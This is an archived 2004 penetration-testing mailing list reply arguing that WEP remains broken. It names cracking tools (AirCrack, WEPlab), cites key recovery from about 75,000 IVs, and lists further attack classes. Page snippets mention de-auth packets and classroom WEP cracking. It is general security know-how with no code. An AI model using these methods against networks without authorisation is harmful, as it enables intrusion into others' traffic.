Re: Wireless Scanning

• Previous message: Mike: "RE: snmp"
• In reply to: Jason T: "RE: Wireless Scanning"
• Next in thread: Jerry Shenk: "RE: Wireless Scanning"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Tue, 28 Sep 2004 16:01:50 -0400
To: 'Pen-Test' <pen-test@securityfocus.com>

Jason T wrote:
> Just a comment on using a WEP cracking programs. I heard from Keith
> Parsons who is an expert wireless teacher saying that WEP cracking in
> the wild today doesn't exist in most cases.

I suspect Parsons said this based on empirical evidence due to the
difficulty he perceives in recovery WEP keys. Since most attacks
against WEP are passive or offline attacks, it's difficult to know if it
is used frequently in practice. More below.

> In early 2002 all vendors saw the weak IV as an attack. So they
> changed the firmware to no longer support those weak IV's. If you
> want to crack WEP it will most likely be on an AP that has a firmware
> version prior to 2002.

While it is true that tools like wep_attack and AirSnort rely on the now
less-common IV values, more recent tools such as AirCrack and WEPlab are
successful at recovering WEP keys even when common weak IV's are
filtered. I've been successful at recovering WEP keys with as few as
75,000 IV's with AirCrack.

Moreover, there are other key-recovery attack methods as well, including
dictionary attacks and attacks against the Neesus Datacom key generation
algorithm. Not to mention many other attacks against WEP to inject
frames or decrypt traffic without the knowledge of the WEP key (ICV
invalidation, IV collision/known plaintext recovery, etc.)

WEP is badly broken. Even when deployed in a dynamic keying environment
with short key durations, it is susceptible to many different attacks.
I recommend steering away from WEP-based encryption wherever security is
a concern.

-Josh

-- 
-Joshua Wright
jwright@hasborg.com
http://home.jwu.edu/jwright/
pgpkey: http://home.jwu.edu/jwright/pgpkey.htm
fingerprint: FDA5 12FC F391 3740 E0AE BDB6 8FE2 FC0A D44B 4A73
Today I stumbled across the world's largest hotspot.  The SSID is "linksys".

• Previous message: Mike: "RE: snmp"
• In reply to: Jason T: "RE: Wireless Scanning"
• Next in thread: Jerry Shenk: "RE: Wireless Scanning"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages RE: Cracking WEP and WPA keys ... Has anyone tried cracking WEP with a Cisco 1200AP? ... Subject: Re: Cracking WEP and WPA keys ... >Audit your website security with Acunetix Web Vulnerability Scanner: ... Up to 75% of cyber attacks are launched on shopping carts, ... (Pen-Test) Re: Cracking WEP and WPA keys ... I teach a wireless hacking class and perform this wep cracking live in under 4 minutes with generated data. ... some vendors have taken steps to prevent these types of attacks. ... Hackers are concentrating their efforts on attacking applications on ... (Pen-Test) Re: Cracking WEP and WPA keys ... My students can crack almost any WEP key in 10-30 minutes using the ... I just finished NS621 - Applied Wireless Network Security at Capitol ... GB of video files from a Linux server in my house so that IV ... Cross site scripting and other web attacks before hackers do! ... (Pen-Test) Re: Cracking WEP and WPA keys ... College as one of the final classes in my Masters in Network Security, and lab 5 for 621 was cracking WEP. ... GB of video files from a Linux server in my house so that IV ... 802.11G PCMCIA card, and the Linux server was running Samba to talk to ... Cross site scripting and other web attacks before hackers do! ... (Pen-Test) RE: Cracking WEP and WPA keys ... To capture the weak Ivs you need to send De-auth packets. ... Who even worry about cracking WEP, WPA, LEAP so on???? ... Corrupt the DNS cache and point to your website that looks like Google ... Up to 75% of cyber attacks are launched on shopping carts, ... (Pen-Test)